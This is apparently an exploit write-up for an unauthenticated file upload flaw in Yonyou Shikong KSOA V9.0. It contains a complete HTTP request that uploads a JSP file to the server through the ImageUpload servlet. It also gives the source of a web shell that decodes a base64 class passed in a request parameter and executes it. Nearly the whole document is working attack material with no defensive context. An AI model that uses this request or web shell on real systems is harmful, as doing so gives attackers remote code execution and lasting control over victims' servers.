用友时空 KSOA V9.0 文件上传漏洞

/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=

POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=1.jsp HTTP/1.1Host: your-ipPragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: https://en.fofa.info/Accept-Encoding: gzip, deflateAccept-Language: en,zh-CN;q=0.9,zh;q=0.8Cookie: JSESSIONID=825A011F31259CCA1649D5DF4849635EConnection: closeContent-Length: 1
<%!your-payload%>

<%!    class U extends ClassLoader {        U(ClassLoader c) {            super(c);        }        public Class g(byte[] b) {            return super.defineClass(b, 0, b.length);        }    }     public byte[] base64Decode(String str) throws Exception {        try {            Class clazz = Class.forName("sun.misc.BASE64Decoder");            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);        } catch (Exception e) {            Class clazz = Class.forName("java.util.Base64");            Object decoder = clazz.getMethod("getDecoder").invoke(null);            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);        }    }%><%    String cls = request.getParameter("passwd");    if (cls != null) {        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);    }%>